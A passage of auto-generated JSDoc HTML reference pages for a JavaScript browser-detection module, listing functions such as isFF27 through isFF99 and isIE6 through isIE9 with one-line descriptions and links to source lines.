<h4 class="name" id=".isFF27"><span class="type-signature">(static) </span>isFF27<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF27</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line361">line 361</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF28"><span class="type-signature">(static) </span>isFF28<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF28</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line369">line 369</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF29"><span class="type-signature">(static) </span>isFF29<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF29</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line377">line 377</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF30"><span class="type-signature">(static) </span>isFF30<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF30</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line385">line 385</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF31"><span class="type-signature">(static) </span>isFF31<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF31</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line393">line 393</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF32"><span class="type-signature">(static) </span>isFF32<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF32</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line401">line 401</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF33"><span class="type-signature">(static) </span>isFF33<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF33</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line409">line 409</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF34"><span class="type-signature">(static) </span>isFF34<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF34</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line417">line 417</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF35"><span class="type-signature">(static) </span>isFF35<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF35</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line425">line 425</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF36"><span class="type-signature">(static) </span>isFF36<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF36</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line433">line 433</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF37"><span class="type-signature">(static) </span>isFF37<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF37</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line441">line 441</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF38"><span class="type-signature">(static) </span>isFF38<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF38</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line449">line 449</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF39"><span class="type-signature">(static) </span>isFF39<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF39</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line457">line 457</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF40"><span class="type-signature">(static) </span>isFF40<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF40</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line465">line 465</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF41"><span class="type-signature">(static) </span>isFF41<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF41</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line473">line 473</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF42"><span class="type-signature">(static) </span>isFF42<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF42</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line481">line 481</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF43"><span class="type-signature">(static) </span>isFF43<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF43</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line489">line 489</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF44"><span class="type-signature">(static) </span>isFF44<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF44</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line497">line 497</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF45"><span class="type-signature">(static) </span>isFF45<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF45</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line505">line 505</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF46"><span class="type-signature">(static) </span>isFF46<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF46</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line513">line 513</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF47"><span class="type-signature">(static) </span>isFF47<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF47</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line521">line 521</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF48"><span class="type-signature">(static) </span>isFF48<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF48</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line529">line 529</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF49"><span class="type-signature">(static) </span>isFF49<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF49</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line537">line 537</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF50"><span class="type-signature">(static) </span>isFF50<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF50</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line545">line 545</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF51"><span class="type-signature">(static) </span>isFF51<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF51</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line553">line 553</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF52"><span class="type-signature">(static) </span>isFF52<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF52</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line561">line 561</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF53"><span class="type-signature">(static) </span>isFF53<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF53</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line569">line 569</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF54"><span class="type-signature">(static) </span>isFF54<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF54</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line577">line 577</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF55"><span class="type-signature">(static) </span>isFF55<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF55</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line585">line 585</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF56"><span class="type-signature">(static) </span>isFF56<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF56</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line593">line 593</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF57"><span class="type-signature">(static) </span>isFF57<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF57</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line601">line 601</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF58"><span class="type-signature">(static) </span>isFF58<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF58</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line609">line 609</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF59"><span class="type-signature">(static) </span>isFF59<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF59</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line617">line 617</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF60"><span class="type-signature">(static) </span>isFF60<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF60</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line625">line 625</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF61"><span class="type-signature">(static) </span>isFF61<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF61</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line633">line 633</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF62"><span class="type-signature">(static) </span>isFF62<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF62</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line641">line 641</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF63"><span class="type-signature">(static) </span>isFF63<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF63</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line649">line 649</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF64"><span class="type-signature">(static) </span>isFF64<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF64</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line657">line 657</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF65"><span class="type-signature">(static) </span>isFF65<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF65</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line665">line 665</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF66"><span class="type-signature">(static) </span>isFF66<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF66</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line673">line 673</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF67"><span class="type-signature">(static) </span>isFF67<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF67</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line681">line 681</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF68"><span class="type-signature">(static) </span>isFF68<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF68</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line689">line 689</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF69"><span class="type-signature">(static) </span>isFF69<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF69</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line697">line 697</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF70"><span class="type-signature">(static) </span>isFF70<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF70</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line705">line 705</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF71"><span class="type-signature">(static) </span>isFF71<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF71</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line713">line 713</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF72"><span class="type-signature">(static) </span>isFF72<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF72</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line721">line 721</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF73"><span class="type-signature">(static) </span>isFF73<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF73</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line729">line 729</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF74"><span class="type-signature">(static) </span>isFF74<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF74</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line737">line 737</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF75"><span class="type-signature">(static) </span>isFF75<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF75</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line745">line 745</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF76"><span class="type-signature">(static) </span>isFF76<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF76</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line753">line 753</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF77"><span class="type-signature">(static) </span>isFF77<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF77</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line761">line 761</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF78"><span class="type-signature">(static) </span>isFF78<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF78</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line769">line 769</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF79"><span class="type-signature">(static) </span>isFF79<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF79</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line777">line 777</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF80"><span class="type-signature">(static) </span>isFF80<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF80</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line785">line 785</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF81"><span class="type-signature">(static) </span>isFF81<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF81</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line793">line 793</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF82"><span class="type-signature">(static) </span>isFF82<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF82</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line801">line 801</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF83"><span class="type-signature">(static) </span>isFF83<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF83</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line809">line 809</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF84"><span class="type-signature">(static) </span>isFF84<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF84</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line817">line 817</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF85"><span class="type-signature">(static) </span>isFF85<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF85</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line825">line 825</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF86"><span class="type-signature">(static) </span>isFF86<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF86</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line833">line 833</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF87"><span class="type-signature">(static) </span>isFF87<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF87</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line841">line 841</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF88"><span class="type-signature">(static) </span>isFF88<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF88</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line849">line 849</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF89"><span class="type-signature">(static) </span>isFF89<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF89</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line857">line 857</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF90"><span class="type-signature">(static) </span>isFF90<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF90</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line865">line 865</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF91"><span class="type-signature">(static) </span>isFF91<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF91</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line873">line 873</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF92"><span class="type-signature">(static) </span>isFF92<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF92</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line881">line 881</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF93"><span class="type-signature">(static) </span>isFF93<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF93</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line889">line 889</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF94"><span class="type-signature">(static) </span>isFF94<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF94</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line897">line 897</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF95"><span class="type-signature">(static) </span>isFF95<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF95</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line905">line 905</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF96"><span class="type-signature">(static) </span>isFF96<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF96</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line913">line 913</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF97"><span class="type-signature">(static) </span>isFF97<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF97</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line921">line 921</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF98"><span class="type-signature">(static) </span>isFF98<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF98</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line929">line 929</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF99"><span class="type-signature">(static) </span>isFF99<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF99</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line937">line 937</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isIceweasel"><span class="type-signature">(static) </span>isIceweasel<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Iceweasel.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line46">line 46</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isIE"><span class="type-signature">(static) </span>isIE<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if IE.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line137">line 137</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isIE6"><span class="type-signature">(static) </span>isIE6<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if IE6.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line78">line 78</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isIE7"><span class="type-signature">(static) </span>isIE7<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if IE7.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line86">line 86</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isIE8"><span class="type-signature">(static) </span>isIE8<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if IE8.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line94">line 94</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isIE9"><span class="type-signature">(static) </span>isIE9<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if IE9.</p>
</div>
